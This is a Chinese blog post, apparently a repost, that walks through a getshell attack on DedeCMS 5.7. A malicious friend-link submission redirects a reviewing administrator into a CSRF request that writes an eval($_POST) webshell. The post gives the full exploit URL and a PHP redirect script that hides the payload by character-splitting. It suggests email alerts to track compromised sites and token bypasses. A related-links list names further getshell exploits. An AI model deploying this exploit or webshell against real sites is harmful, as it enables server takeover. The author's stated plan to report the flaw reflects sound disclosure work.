friendlink main.php,灰盒测试之织梦dedecms 5.7 官网最新版 Getshell

最新推荐文章于 2023-05-31 14:19:32 发布
最新推荐文章于 2023-05-31 14:19:32 发布
阅读量451 收藏
点赞数
文章标签: friendlink main.php

很久之前一直用dedecms做二次开发、直接做模版就好了,偶尔要写原生的php代码与dede交互,简单的了解了下里面的model,并未深入,dedecms漏洞那么多、、、能不能也找出一个漏洞呢。 下载了官网最新的程序研究了下。

在前台有个提交友情链接的地方,链接是:/plus/flink_add.php,估计以前可能这里存在xss的吧。反正现在是修复了,不过发现传入的链接,在后台可以直接打开,这样就可以结合csrf进一步利用了。

dede-%E6%BC%8F%E6%B4%9E.png

然后这里网址的,默认有//,也猜到了是提醒这是个http链接,后端没有判断,登陆后台看了下,果然是直接插入进去的:

&lt;sc<x>ript&gt;alert(1)&lt;/scr sc<x>ript> <script>alert(1)</script> 2016-11-04 未审核 50 [更改] [删除]

这样证明了可以做诱导链接了,然后下一步要找csrf可利用的功能,在后台发现一个标签编辑功能里的,dedecms好多地方都是用requests获取的值,不区分get、post,原来是post的,如果post在这肯定构造不成功,get的话,就可以借助csrf一起getshell了。

csrf 诱导 exp链接:./tpl.php?action=savetagfile&actiondo=addnewtag&content=<?php @eval($_POST[‘c’]);?>&filename=hcaker.lib.php  #在当前路径执行这个get请求,写入一句话。

dede-csrf.png

然后就提交了,提交后,后台管理员看到的是这个样子的:

dede-csrf-exp.png

这里就看怎么诱导管理员点击了,一般人看不懂代码,如果点击了,会在 /include/taglib/ 目录下生成一句话 hacker.lib.php,有句话说好奇害死猫,确实是,天上那有掉馅饼的事,别贪便宜,不然容易出事。

就在最后要成功getshell的时候,发生了意外,发现网站名称的href字典限制了长度,把传入的./tpl.php?action=savetagfile&actiondo=addnewtag&content=<?php @eval($_POST[‘c’]);?>&filename=hcaker.lib.php截断为./tpl.php?action=savetagfile&actiondo=addnewtag&content=<?ph ,并没有过滤,看来是限制了字符个数、还是不放弃,产生了另一种好玩的想法,感觉要比这个好玩。

一般后台审核友情链接的人都会看下网站权重,然后决定是否通过审核,这一看就会触发漏洞了。通过分析,需要填一个真实的url,而这个url要获取到referer,然后拼接url重定向,这样就可以实现getshell了,而且还可以在后端做个邮件提醒。方便知道那个站已经getshell了。

然后开始写代码了,这里费了不少时间,主要是一个问题,把代码解析为字符串,用php试过转义、字符串转化等都不成功,最后用序列化函数成功了,但是不完整,程序员的做法应该是序列化和反序列化吧,然后我使用单个字符拼接,解决了问题,其实还可以用ascii码去搞定、原来那些写各种一句话的真不容易,要对语言的任何地方都要了解,不然遇到很多未知的问题。

$exp = ‘tpl.php?action=savetagfile&actiondo=addnewtag&content=’.@eval($_POST[‘c’]).’&filename=hcaker.lib.php’;

//如果您有更好的办法,欢迎提供给我。

然后php做CSRF中转的代码如下:

//print_r($_SERVER);

$referer = $_SERVER['HTTP_REFERER'];

$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径

//拼接 exp

$muma = '@'.'e'.'v'.'a'.'l'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'c'.'\''.']'.')';

$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=hacker.lib.php';

$url = $dede_login.$exp;

//echo $url;

header("location: ".$url);

// send mail coder

exit();

然后就重新开始咯,在友情链接里面添加exp友情链接://******.com/exp.php

对方只要访问了,就自动生成 include/taglib/hacker.lib.php噢、上面没有写e-mail通知代码。

getshell-dedecms.png

getshell-dedecms、、、我要提交补天去、、、

之后发现有的cms会限制只允许输入域名,这也没关系,申请个域名,默认就是/index.php,一样可以getshell,还有的为了防止csrf,在请求中加了token令牌验证,这种是有可能被绕过的,绕过几率为80%,下次有机会实现js无刷新获取token令牌getshell。。。

原文出自 //0535code.com/article/20161104_1193.shtml

本文最后更新于2016-11-22,已超过 1 年没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!

dede织梦后台页面及功能修改及精简操作方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
04-03 2万+
dede织梦后台是PHP非常好用的模板了,下面我们能看下织梦的操作后台,以假肢网站后台为例子。 先让我们来看看都有哪些页面控制着后台的功能和显示。下方为系统默认的后台界面图,为了便于下面的说明我对各个部分进行了一些标示。共A、B、C、D、E五个区域。 常用:A区域【顶部LOGO行】对应文件:/dede/templets/index2.htm【常用】 和/dede/templet...
dede批量Getshell
10-31
这个是百度批量的。自己保存为xx.php <...$exploit=Getshell($url); if (...% 5BGLOBALS%5D%5Bcfg_dbname%5D=de...
php写入织梦,dedeCMS远程写入getshell(测试版本V5.7
weixin_39645041的博客
03-12 232
该漏洞必须结合apache的解析漏洞:当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。dede在安装完成,如果没有删除install文件夹,在install下会有一个index....
login.php gotopage,DedeCMS前台鸡助Getshell漏洞
weixin_36068015的博客
03-29 482
@phpice 后台再次编辑有问题,先把你的回复用我的账号发,晚点给你恢复过来我在16年的时候也以为是一个前台的漏洞,并提交给了先知,被驳回了,再后来我仔细测试后发现其实这是一个后台漏洞。如果不仔细读代码确实很容易被误导。你能在本地测试成功是因为你先登录了后台,此时已经存在了一个登录后台成功的session,然后再没用注销登录的情况下直接访问member目录,这个时候前台自动登录了admin账号,...
dedeCMS后台getshell
qq_45300786的博客
05-12 1721
这里有三种方法 新建webshell和上传webshell 一、上传webshell 二、新建webshell shell工具连接成功 三、在默认模本里写入webshell 然后更新一下 连接shell工具 连上之后,在写入一个新的webshell,记得再把原来页面改回去。 shell工具连接这个系统文件 ...
DEDECMS5.7后台getshell1
08-03
DEDECMS5.7后台getshell1
于飞seo:dedecms织梦文件目录说明讲解大全
仿站、源码搭建/迁移技术博客
12-31 740
鉴于很多新手朋友不知道织梦很多目录和文件具体有何作用,而现互联网亦没有相对全面的dedecms文件目录解说,于飞seo在相对全面的基础上整理了以下目录文件。 以下一些目录对应的文件和代表的含义均是在相对详细下完成的,如若有错误请联系我们指出。了解织梦文件目录结构有什么?很简单,方便做安全(删除某些不需要的文件)和修改整个系统界面方便。当然更多的好处需要自己根据自己的需求进行挖掘定制了...
关于Dedecms织梦文件目录结构全面解析
qq_17475727的博客
08-19 762
本文主要是为了今后对Dedecms做二次开发所写。 安装后dedecms的目录,如下图所示 “a”: 默认HTML文件存放目录 “data”: 系统缓存或其它可写入数据存放目录 “dede”: 默认后台管理目录 “images”: 系统默认模板图片存放目录 “include”: 类库文件目录 “install”: 安装程序目录,安装完后可删除 “member”: 会员目录 “plus”: 附助...
DEDE 5.7中各函数所在的文件和位置-方便二次开发
云度
08-12 1099
/include/taglib/tag.lib.php 2 //function GetTags() /include/payment/yeepay.php 415 function log_result() /dede/stepselect_main.php 204 function __addenum_save() /dede/stepselect_main.php 147 functio...
JBLOG v1.5 正式版.rar
07-07
20、模板文件link.php改为使用get_friendlink()函数调用友情链接。 21、模板文件tag.php改为使用get_tags()函数调用所有标签,删除原有函数。 22、取消模板文件closed.php,改为系统内置。 23、模板文件404....
收割机Getshell软件.zip
05-30
扫描后缀.txt,存放shell扫描用的后缀,自己可以添加更多后缀。 webshell.txt,存放扫描到的Webshell。 uploaddata/asp.txt,存放asp上传文件。 uploaddata/aspx.txt,存放aspx上传文件。 uploaddata/php.txt,存放php上传文件。 收割机.exe,主程序
dedecms V5.7 SP2 web后台getshell
公众号shadow sock7
11-12 5247
https://www.freebuf.com/vuls/164035.html dede/tpl.php任意文件写入漏洞。 条件:已登录后台。 首先访问/dede/tpl.php?action=upload获取token值 访问/dede/tpl.php?filename=&amp;amp;amp;amp;amp;lt;yourname&amp;amp;amp;amp;amp;gt;.lib.php&amp;amp;amp;amp;amp;amp;action=savetagf
Dedecms 5.7 SP2后台getshell
一个安全研究员
07-02 9911
前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本是dedecms最新版吧,下载地址: http://www.dedecms.com/products/dedecms/downloads/ 复现 版本: 我这里测试的是utf8版,这个版本应该不影响。 漏洞位...
【漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
最新发布
做自己喜欢的事,并将其发挥到极致!
05-31 3848
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
dedecms download.php getshell,Dedecms_V5.7 getshell 利用后台文件上传功能漏洞
weixin_30938297的博客
04-02 458
虽然是复现文章,不过会更详细地来阐释这个漏洞,,因为现在后台getshell花样层出不穷,因此想要复现一波来学习一波getshell姿势~因为是最新的dedecms版本,因此我们直接在织梦官网上下载即可~http://www.dedecms.com/products/dedecms/downloads/DedeCMS V5.7 SP2正式版发布日期: 2017-04-05这里我测试的是utf-8版...
dede ad_js.php getshell,nday漏洞还原分析之dedecms后台getshell
weixin_34151001的博客
03-29 536
前言最近发现 dedecms 的 nday后台getshell ,于是打算还原一下。根据日志显示,攻击者访问了 dede/ad_add.php 文件后,转而访问 plus/ad_js.php 文件,提交的 payload 为 plus/ad_js.php?nocache=1&aid=1&_=whoami 。前期准备我们先来看一下 dede/ad_add.php 文件。可以看到这是一...
CVE-2018-9175 DEDECMS后台getshell
weixin_43263451的博客
03-19 1671
基础 dedecms对于输入是首先全局进行过滤的,在/common.inc.php中注册(赋值变量)并过滤外部提交的参数,下图可以看到对输入参数进行addslashes 漏洞分析 首先在 dede\sys_verifies.php的152行 159-160行创建配置文件modifytmp.inc 161-162行给其中写入一些php的头和内容 166行中refiles参数是我们可控的,看起来默认是数组格式,对于refiles里面每一个值从168-180行进行一些操作,注意最重要的是180行,前面都无所谓
DeDeCMS(织梦)变量覆盖0day getshell
weixin_33895016的博客
03-21 194
测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! #!usr/bin/php -w &lt;?php error_reporting(E_ERROR); set_time_limit(0); print_r(' DEDEcms Variable Coverage Exploit Author: [url]www.he...
dedeCMS后台getshell(三种方法)
weixin_51692662的博客
11-29 1262
dedecms后台sql命令写入一句话
php168 v6模板结构详解与开发指南
在这个系统中,模板文件是整个网站视觉呈现的关键,它们决定了网站的布局、样式以及功能模块的展示方式。以下是对php168 v6模板开发的详细说明: 1. 模板目录结构: - `head.htm`:头部模板,通常包含网站的元信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值